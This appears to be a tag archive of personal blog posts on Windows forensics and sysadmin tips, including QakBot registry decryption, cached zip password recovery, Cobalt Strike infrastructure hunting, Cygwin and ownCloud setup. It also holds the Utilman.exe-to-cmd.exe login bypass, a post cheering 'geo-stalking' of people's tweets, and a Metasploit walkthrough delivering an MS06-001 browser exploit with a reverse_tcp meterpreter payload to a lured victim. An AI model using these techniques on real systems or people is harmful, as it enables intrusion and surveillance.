Tag Archives: windows

Decrypting QBot/QakBot Registry

Recently, we had a host machine that was infected with QBot/QakBot. Upon investigation, we found that it had added a registry key with a random name.

Based on some Googling, I found this article – Decrypting Qakbot’s Encrypted Registry Keys – which explains in detail the encryption routine and how to decode the encrypted registry key.

But I wondered: how do we decode the registry when we only have the collected artifacts, e.g. NTUSER.dat and the SOFTWARE registry hive?

Key Generation

Initially, Qakbot gathers system information from the infected host, including:
1. Computer Name (using GetComputerNameW)
2. Volume Serial Number (using GetVolumeInformationW)
3. User Account Name (using LookupAccountSidW)

Let’s take, for example, our infected machine’s information:
Computer name: DESKTOP-4NQG47A (converted to UPPERCASE)
Volume Serial: 2797280851 (converted from the hexadecimal serial number A6BB1E53)
User Account Name: SECRET ACCOUNT (converted to UPPERCASE)

This information is then concatenated to form a password:
DESKTOP-4NQG47A2797280851SECRET ACCOUNT

The password is then hashed using a modified CRC32_shift4 algorithm.
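To make the artifact-to-password step concrete, here is an added Python example (my own, not code from the post or from the linked decrypt script): it uppercases the two names, converts the hex serial to decimal and concatenates them exactly as described, and includes a standard nibble-table CRC-32 (the "shift4" form) as the reference routine. Qakbot's modifications to that routine, and the string encoding it hashes, are as described in the linked article and are not reproduced here.

```python
import zlib

# Reflected CRC-32 polynomial (IEEE 802.3): the base that "CRC32_shift4" variants build on.
CRC32_POLY = 0xEDB88320


def _nibble_table():
    """16-entry table: consuming 4 bits per step is what the 'shift4' name refers to."""
    table = []
    for i in range(16):
        c = i
        for _ in range(4):
            c = (c >> 1) ^ CRC32_POLY if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _nibble_table()


def crc32_shift4(data: bytes) -> int:
    """Standard (unmodified) CRC-32 computed one nibble at a time.
    Qakbot's routine is a modified version of this; the exact tweaks live in the
    referenced write-up and decrypt script, not in this reference implementation."""
    crc = 0xFFFFFFFF
    for b in data:
        crc = _TABLE[(crc ^ b) & 0x0F] ^ (crc >> 4)          # low nibble of the byte
        crc = _TABLE[(crc ^ (b >> 4)) & 0x0F] ^ (crc >> 4)   # high nibble of the byte
    return crc ^ 0xFFFFFFFF


def matches_zlib(data: bytes) -> bool:
    """Self-check: the nibble-wise routine must agree with zlib's byte-wise CRC-32."""
    return crc32_shift4(data) == (zlib.crc32(data) & 0xFFFFFFFF)


def volume_serial_decimal(hex_serial: str) -> int:
    """'A6BB1E53' or 'A6BB-1E53' (as shown by PowerShell/vol) -> 2797280851 (as Qakbot uses it)."""
    return int(hex_serial.replace("-", ""), 16)


def build_password(computer_name: str, hex_serial: str, user_name: str) -> str:
    """COMPUTERNAME + decimal volume serial + USERNAME, both names upper-cased."""
    return f"{computer_name.upper()}{volume_serial_decimal(hex_serial)}{user_name.upper()}"


if __name__ == "__main__":
    # Values from the post's infected machine.
    print(build_password("DESKTOP-4NQG47A", "A6BB1E53", "SECRET ACCOUNT"))
    print(hex(crc32_shift4(b"123456789")))  # standard CRC-32 check value
```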

Getting Ready

Typically, during a case investigation, we already have the Computer Name and User Account Name, but we are missing the Volume Serial Number. To get it, run the PowerShell command below on the infected host:

PS C:\ > Get-WmiObject Win32_volume | Format-table Name, @{Label = "SerialNumber"; Expression = {"{0:X}" -f $_.SerialNumber}}  -auto
Name                                        SerialNumber
----                                        ------------
C:\                                          CE6EB0A8

Next, convert the serial number from hex to decimal, e.g. at https://www.rapidtables.com/convert/number/hex-to-decimal.html

CE6EB0A8 –> 3463360680

Now we have the details of the infected host:

W7VM39DKGH
3463360680 (from hex CE6EB0A8)
MAX_MAXIMUS

Next, we are going to use the script below to decrypt the registry key:
https://github.com/drole/qakbot-registry-decrypt

* Please note that this script needs to be run using Python 3+ on Windows, as it uses the winreg library.
* Please set this up in your VM, as we need to load/add the encrypted registry file to the local machine.


Download the script and ensure the required libraries and modules are installed in your VM.

Next, export the encrypted registry key. In this example, I’m extracting the encrypted registry key from NTUSER.dat:

To export it, open the NTUSER.dat file using Registry Explorer. Then go to the encrypted registry path; in this case it is SOFTWARE\Microsoft\Cjxgyfyefv. Right-click the key Cjxgyfyefv and select Export –> Key –> To .reg format. Choose a file name and location to save it.

Copy the exported .reg file to your VM. Then double-click the saved/exported .reg file to load/add it on your VM:

Click Yes to load/add the registry key.

Check whether the registry key is loaded via regedit:

Next, we are going to decrypt the registry key.

Before running the script, we need to make some modifications. Comment out lines 52 to 63:

Then add the following: computer_name, volume_serial_number (the decimal value converted from the hex serial) and user_account_name of the infected machine. Refer to the screenshot above.

After that, run the Python script to decrypt the registry:

python qakbot-registry-decrypt.py -r HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cjxgyfyefv

Remember to also include the path to the encrypted registry key; in this case it is HKEY_CURRENT_USER\SOFTWARE\Microsoft\Cjxgyfyefv.

As you can see, we are able to decode the registry key and read its content. We see the possible C2 IP, 85.86.242.245, the .dll name and location, and the time of execution.

Check the C2 IP in VT – https://www.virustotal.com/gui/ip-address/85.86.242.245/detection

It seems the IP is also noted as QBot/QakBot-related by various sources.

That’s all from me. Hope you enjoy reading the article. 🙂

Windows Credentials Manager – Looking for cached Zip Passwords

Intro

When you open a password-protected zip archive using Windows Explorer (“Extract All…”) on Windows 8.x/10, the password is automatically cached in the Credential Manager for the life of the logon session.

Let’s say you discover a host infected with malware that came from a password-protected zip file. We can try to extract the cached/stored credentials from Windows Credential Manager and see whether it stores the password for the password-protected file we are looking for.

Steps

To check whether the host holds the password for the file we need, run the command below (requires admin privileges):

cmdkey /list

It will show the list of stored credentials that are available. If your target file is not listed, the credential has probably gone (the host has been rebooted) or the file was extracted using a third-party app (WinRAR, 7-Zip).

To recover the password, we’ll use this PowerShell script – https://github.com/zetlen/clortho/blob/master/CredMan.ps1

Download and save the script onto the target machine. Then run it as below:

.\CredMan.ps1 -GetCred -Target "target_credential"

e.g.:

.\CredMan.ps1 -GetCred -Target 'Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\Administrator\Downloads\GeoIP.zip'

As you can see, we are able to retrieve the “GeoIP.zip” password (pass: testtest).
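When triaging a host, the first question is which archives Explorer has a cached credential for, and what exact -Target string to hand to CredMan.ps1. The added Python helper below (my own, not from the post or from the CredMan project) pulls the Microsoft_Windows_Shell_ZipFolder targets out of `cmdkey /list` output; the sample output is constructed, with the Target/Type/User layout cmdkey prints.

```python
import re

# Prefix Explorer uses for the per-archive credential it caches for the logon session.
ZIP_PREFIX = "Microsoft_Windows_Shell_ZipFolder:filename="

# Constructed sample of `cmdkey /list` output (only the "Target:" lines are parsed).
SAMPLE_CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Microsoft_Windows_Shell_ZipFolder:filename=C:\\Users\\Administrator\\Downloads\\GeoIP.zip
    Type: Generic
    User: Administrator

    Target: Domain:target=fileserver.example.local
    Type: Domain Password
    User: CORP\\analyst
"""


def list_targets(cmdkey_output):
    """Every credential target name cmdkey reported, in order."""
    return re.findall(r"^\s*Target:\s*(.+?)\s*$", cmdkey_output, flags=re.MULTILINE)


def cached_zip_archives(cmdkey_output):
    """Map each Explorer zip-folder target to the archive path it covers."""
    return {t: t[len(ZIP_PREFIX):]
            for t in list_targets(cmdkey_output) if t.startswith(ZIP_PREFIX)}


def find_archive_target(cmdkey_output, archive_name):
    """Return the exact -Target string for an archive given just its file name, or None."""
    for target, path in cached_zip_archives(cmdkey_output).items():
        if path.lower().endswith(archive_name.lower()):
            return target
    return None


def credman_command(target):
    """The CredMan.ps1 invocation from the post, with the target single-quoted for PowerShell."""
    return f".\\CredMan.ps1 -GetCred -Target '{target}'"


if __name__ == "__main__":
    for target, path in cached_zip_archives(SAMPLE_CMDKEY_OUTPUT).items():
        print(f"{path}\n    {credman_command(target)}")
```

On a live host, feed it the real output with `subprocess.run(["cmdkey", "/list"], capture_output=True, text=True).stdout` instead of the constructed sample.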

Hunting for possible attacker Cobalt-Strike infra

Recently, we had an incident where suspicious traffic related to an external C2 was observed. Initial findings showed that the IP 172.241.27.17 (172.241.24.0/21) resolved to
atakai[-]technologies[.]host, according to pDNS in VirusTotal [1].

Further digging on this IP found that it has port 50050 open. The Recorded Future threat analysis report & the Cobalt Strike Team Server Population Study both mention that the default port for the Cobalt Strike controller is 50050.

So I asked myself: what if the neighbouring IPs were also set up as Cobalt Strike infrastructure? So I decided to go on this journey…

First, we know that the IP range is 172.241.24.0/21. Using this tool, we can convert the CIDR notation to a range of IP addresses.

The result: we have 2048 addresses, the IP address range 172.241.24.0-172.241.31.255.

Next, we use an online tool named Reverse IP & DNS API from WhoisXML API. This tool reveals all domains that share an IP address. Example as below:

To use this tool, we need to buy credits to use its API. A free account only has 100 credits to be used on the Domain Research Suite tools, but in this case we need around 2050 credits. Based on their website, 1000 DRS credits = $19.00. So.. yeah..

After you have enough credit, you can use the script as below:

#!/bin/bash
# Query the WhoisXML Reverse IP API once per address listed in ip.txt
# (one IP per line) and append each raw JSON response to output.txt.

url="https://reverse-ip.whoisxmlapi.com/api/v1?apiKey=whoisxml_apikey&ip="

while IFS= read -r i; do
	content="$(curl -s "$url$i")"
	echo "$content" >> output.txt
done < ip.txt

Remember to put your API key into the script. It will produce the results in “output.txt“.

After that, import your results into Excel. Then we sort and select possible domains from the output based on the domain naming convention, e.g. atakai, amatai, amamai:

Now we have possible suspected IPs & domains. To dig further, we’ll use Shodan.io to see which open ports are available on those IPs.

To use it, we’ll use the command below (curl expands the braces into one request per IP):

$ curl -s https://api.shodan.io/shodan/host/{172.241.27.17,172.241.27.44,172.241.27.62,172.241.27.65,172.241.27.66,172.241.27.68,172.241.27.72,172.241.27.225,172.241.29.155,172.241.29.156,172.241.29.157}?key=shodan_apikey | jq -r '. | "IP: \(.ip_str) Ports: \(.ports)"'

The output should look like this:

Now we know 7/11 (no pun intended) IPs have been observed by Shodan with port 50050 open. This indicates that this set of IPs is possibly used as part of Cobalt Strike infra.

The next step would be to look up the registration date of each domain from Whois data. But I’m too lazy to continue this. Also, I’ve encountered several Whois providers giving different info regarding domain registration dates. So yeah, maybe I’ll update next time when I’m free 😉
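As an added Python example (mine, not from the post), the CIDR expansion and the Shodan triage above in one offline script: it expands 172.241.24.0/21, checks whether a candidate IP falls inside the block, and parses back-to-back JSON host records (the ip_str/ports fields the jq filter reads) to flag hosts with 50050 open. The host records are constructed TEST-NET addresses, not the IPs from the incident.

```python
import ipaddress
import json

CIDR = "172.241.24.0/21"      # block the first C2 IP belonged to
TEAMSERVER_PORT = 50050       # default Cobalt Strike controller port per the cited reports

# Constructed stand-in for several concatenated Shodan /shodan/host responses
# (only the two fields the jq filter in the post uses). Addresses are TEST-NET-3.
SAMPLE_SHODAN_OUTPUT = (
    '{"ip_str": "203.0.113.10", "ports": [22, 50050]}\n'
    '{"ip_str": "203.0.113.11", "ports": [80, 443]}\n'
    '{"ip_str": "203.0.113.12", "ports": [50050]}'
)


def expand_cidr(cidr):
    """The manual 'CIDR to IP range' step: every address in the block."""
    return [str(ip) for ip in ipaddress.ip_network(cidr, strict=False)]


def range_bounds(cidr):
    net = ipaddress.ip_network(cidr, strict=False)
    return str(net[0]), str(net[-1])


def in_range(ip, cidr):
    """Is a candidate neighbour actually inside the block we are pivoting on?"""
    return ipaddress.ip_address(ip) in ipaddress.ip_network(cidr, strict=False)


def parse_concatenated_json(text):
    """curl-appended API output holds JSON objects back to back; decode them one by one."""
    decoder = json.JSONDecoder()
    pos, objs = 0, []
    while True:
        while pos < len(text) and text[pos].isspace():
            pos += 1
        if pos >= len(text):
            return objs
        obj, pos = decoder.raw_decode(text, pos)
        objs.append(obj)


def flag_teamserver_candidates(records, port=TEAMSERVER_PORT):
    """IPs whose Shodan-observed ports include the default team server port."""
    return sorted(r["ip_str"] for r in records if port in r.get("ports", []))


def summarize(records, port=TEAMSERVER_PORT):
    hits = flag_teamserver_candidates(records, port)
    return f"{len(hits)}/{len(records)} IPs with port {port} open"


if __name__ == "__main__":
    lo, hi = range_bounds(CIDR)
    print(f"{CIDR}: {len(expand_cidr(CIDR))} addresses, {lo}-{hi}")
    recs = parse_concatenated_json(SAMPLE_SHODAN_OUTPUT)
    print(summarize(recs), flag_teamserver_candidates(recs))
```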

Import & export installed Cygwin packages

Recently I changed my workstation to a new one. Previously, I had installed a bunch of Cygwin packages on my old workstation.

So I thought: can I somehow migrate my installed Cygwin packages from my old workstation to the new one?

The answer is yes. Follow along on this wonderful journey XD

First, you’ll need to save a list of what you have installed in Cygwin on the old workstation.

To do this, open the Cygwin terminal/console & run the command below:

grep " 1$" /etc/setup/installed.db | awk '{printf "%s%s",sep,$1; sep=","} END{print ""}' > cygwin_packages.txt

It basically dumps the list of installed Cygwin packages on your workstation & saves it, comma-separated, to a text file named “cygwin_packages.txt”.

Next, go to your Cygwin home folder (commonly located at “C:\cygwin64\home\”), open the “cygwin_packages.txt” file that we saved before & copy all the content inside the text file (CTRL-C).

Next, on your new workstation, ensure you have downloaded the latest Cygwin installer, “setup-x86.exe” (32-bit) or “setup-x86_64.exe” (64-bit).

Then open a Windows cmd & change directory to where you saved the Cygwin installer; in my case, I saved it in my Downloads folder “C:\Users\Zam\Downloads”.

Then run the command below in the Windows cmd, replacing the placeholder inside the double quotes with the content of cygwin_packages.txt:

setup-x86.exe -q -P "<paste the cygwin_packages.txt content here>"

You should see the Cygwin GUI open & a UAC permission pop-up:

Click “Yes”, go through the “Next” buttons & wait until the installation has finished.

Upgrade Python packages using pip

As the title says, here is how to update your Python packages via pip.

For Linux/*nix:

pip freeze --local | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U

P.S.: you may need to run this with sudo. Probably.

For Windows:

for /F "delims===" %i in ('pip freeze -l') do pip install -U %i

Credit:

http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip

Installing Owncloud on Nginx (Ubuntu 12.04)

Here I want to share with you how to create your own sync server, like Dropbox.
The software that we will use is ownCloud.

But before we start, please ensure that you already have nginx up & running.
For a tutorial, please refer here.

1. Make sure your OS is updated

apt-get update
apt-get upgrade

2. Install the required packages

apt-get install php5-cgi autoconf automake autotools-dev curl libapr1 libtool curl libcurl4-openssl-dev php-pear php-xml-parser php5 php5-cli php5-common php5-curl php5-dev php5-gd php5-sqlite php5-fpm

3. Edit the nginx site config file

vi /etc/nginx/sites-available/default

4. Edit it like this;
Copy the lines below;

server {
        listen   80;
        root /usr/share/nginx/www;
        index index.php index.html index.htm;
        server_name _;

        location / {
                try_files $uri $uri/ @webdav;
        }

        # never serve ownCloud's data, config or metadata files directly
        location ~ ^/(data|config|\.ht|db_structure\.xml|README) {
                deny all;
        }

        error_page 500 502 503 504 /50x.html;
        location = /50x.html {
                root /usr/share/nginx/www;
        }

        # hand .php/.php5 scripts to PHP-FPM (dot escaped so this does not match every request)
        location ~ \.php5?$ {
                try_files $uri =404;
                fastcgi_split_path_info ^(.+\.php)(/.+)$;
                fastcgi_pass unix:/tmp/php5-fpm.sock;
                fastcgi_index index.php;
                include fastcgi_params;
        }

        # WebDAV endpoint used by the sync clients
        location ~ ^/owncloud/remote\.php(/.*)$ {
                fastcgi_split_path_info ^(.+\.php)(/.*)$;
                fastcgi_pass unix:/tmp/php5-fpm.sock;
                include fastcgi_params;
        }

        location @webdav {
                fastcgi_split_path_info ^(.+\.php)(/.*)$;
                # point this at the socket your PHP backend actually listens on
                fastcgi_pass unix:/tmp/php5-cgi.sock;
                include fastcgi_params;
        }

        location ~ /\.ht {
                deny all;
        }
}

The “root /usr/share/nginx/www” line defines the root directory for nginx.
You can change it to other path you like.

5. Edit /etc/php5/conf.d/xcache.ini
Edit these two lines;

xcache.size = 64M
xcache.var_size = 64M

6. Edit /etc/php5/fpm/php.ini
Edit these two lines (the upload limit directive in php.ini is upload_max_filesize);

post_max_size = 2G
upload_max_filesize = 2G

7. Reload php5-fpm

/etc/init.d/php5-fpm reload

8. Get the latest ownCloud file (latest 4.5 (4.5.5))

wget http://mirrors.owncloud.org/releases/owncloud-4.5.5.tar.bz2

9. Extract it at /usr/share/nginx/www

tar xvf owncloud-4.5.5.tar.bz2

So the path will be /usr/share/nginx/www/owncloud after extraction & the URL will be http://localhost/owncloud

10. Set the directory permissions;

chown -R www-data:www-data /usr/share/nginx/www

Replace ‘/usr/share/nginx/www‘ with your own preferred path. (The path must be the same as the one in /etc/nginx/sites-available/default)

11. Go to http://localhost/owncloud (or the same path on your server’s address).
Create a new admin account. Also please ensure that the path to the data folder is correct.

12. Create a new folder named “clientsync“, something like this;

13. Get the Desktop Sync Client here: http://owncloud.org/sync-clients/
Install it and put in your credentials accordingly.

14. If everything is fine, then your ownCloud has been configured properly. Congratz!

Done. Hope it helps. 🙂

Reset Windows Server 2008 R2 password

Reset the administrator/user password on Windows Server 2008 using the Windows installation disk

  1. Insert the Windows Server 2008 installation DVD
  2. Restart the computer and select boot from DVD
  3. Choose the option “Repair your computer”
  4. Select the command prompt
  5. Type in “C:”
  6. Then, “CD C:\Windows\System32”
  7. MOVE Utilman.exe Utilman.exe.bak
  8. COPY Cmd.exe Utilman.exe
  9. You may also need to enable the administrator account, which can be done using “NET USER administrator /active:yes”
  10. Restart Windows
  11. Then, at the login screen, press Windows-U; this fires up cmd.exe
  12. NET USER <username> <password>, e.g. NET USER administrator Presto!
  13. Now restart the computer again and move the original Utilman.exe back, e.g. MOVE Utilman.exe.bak Utilman.exe

Geo-stalking with Bing Maps and the Twitter Maps App

Geo/Social stalking is fun. Bing Maps has the ability to add various “apps” to the map to enhance your Bing Maps experience. One of the cooler ones is the Twitter Maps app, which lets you map geotagged tweets.

Let’s start somewhere fun, like the German-Malaysian Institute (GMi), Bangi, and see who’s tweeting around there.. ;D

First, open www.bing.com/maps/

Then, you can change the view to Aerial View for a nicer look. ;D
You may change to any other place you want to view, e.g. your home, college, workplace

Then, select the Map apps option..

Then, select the Twitter Maps app..

Wait a while for the page to load the necessary things (loading tweets around the map you are currently viewing)

Aaannndd.. Ta-Da! Happy Stalking. ;D

Thanks to carnal0wnage for this tip. 😉

Metasploit?

Have you ever wanted to use Metasploit?
Have you ever managed to get a session using Metasploit?
I had never managed to use this Metasploit.. 🙁

But I never give up (except for certain things)..
Finally I managed to use it..
And got access to that PC too.. 🙂

So, let me share how I did this..
First, install Metasploit.
It doesn’t matter which version.
You can update it later.

After installing, don’t forget to update.
That way you’ll have more exploit sources to use later.

After installing & updating,
run Metasploit.
Run the console one.
Because people always say
that using the CLI is more effective.
So, you should try it.. 😉

Once it’s running,
type this..

use windows/browser/ms06_001_wmf_setabortproc

That’s the exploit we’ll be using..
This exploit uses the browser (IE) to do its work..

Once you’ve set your exploit,
set your payload..

set payload windows/meterpreter/reverse_tcp

Once you’ve set the payload,
assign/fill in whatever is needed, like LHOST, LPORT, SRVHOST, URL & other relevant options..

set SRVHOST 192.168.56.101
set LHOST 192.168.56.101

Once everything is set,
type show options to review all your settings..
Whether they’re right or not. Fill in whatever it requires if you haven’t already..

Once it’s all done,
type exploit..
It’ll output something like this..

[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[-] Handler failed to bind to 192.168.56.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://192.168.56.101:8080/asjKYXWBb3z
[*] Server started.
[*] Sending exploit to 192.168.56.102:1274...
[*] Sending stage (748032 bytes) to 192.168.56.102

So, you’ll have to get your victim to go to the URL http://192.168.56.101:8080/asjKYXWBb3z..
Only then will it work..
Otherwise the exploit & payload will never run.. :p

Once you’ve got your victim to open the URL,
you’ll see in your msfconsole the flow of the exploit being run against the victim who opened the URL..

If your exploit succeeds,
it’ll output something like this..

[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1275) at 2010-08-07 00:57:21 +0800

Haa.. Got them! You now have 1 session with them..
You can upload/download and do all sorts of things on their PC..
Let’s have a look..

msf exploit(ms06_001_wmf_setabortproc) > sessions -l

Active sessions
===============

Id  Type         Information                         Connection
--  ----         -----------                         ----------
1   meterpreter  4NGRY-LE0P4RD\zer0 @ 4NGRY-LE0P4RD  192.168.56.101:4444 -> 192.168.56.102:1275

msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\zer0\Desktop
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:17 +0800  .
40777/rwxrwxrwx   0        dir   2010-06-05 15:09:29 +0800  ..
100777/rwxrwxrwx  690176   fil   2009-10-28 10:56:12 +0800  .NET Version Detector 2010.exe
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:19 +0800  Core_impact4
40777/rwxrwxrwx   0        dir   2010-06-05 16:37:23 +0800  Desktop
100666/rw-rw-rw-  1677     fil   2010-06-26 04:14:53 +0800  Process Hacker.lnk
100666/rw-rw-rw-  626      fil   2010-06-05 15:16:34 +0800  mirc.lnk
40777/rwxrwxrwx   0        dir   2010-06-05 14:54:58 +0800  nc111nt
100777/rwxrwxrwx  1261193  fil   2010-03-29 16:40:18 +0800  processhacker-1.11-setup.exe

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 08:00:27:af:62:54
IP Address  : 192.168.56.102
Netmask     : 255.255.255.0

Yay! I did it. Haha..
It’s a simple thing, really..
I guess nobody else would even care that I can do this.. 🙁

Anyway, happy trying.
If there’s anything, feel free to ask me.. 🙂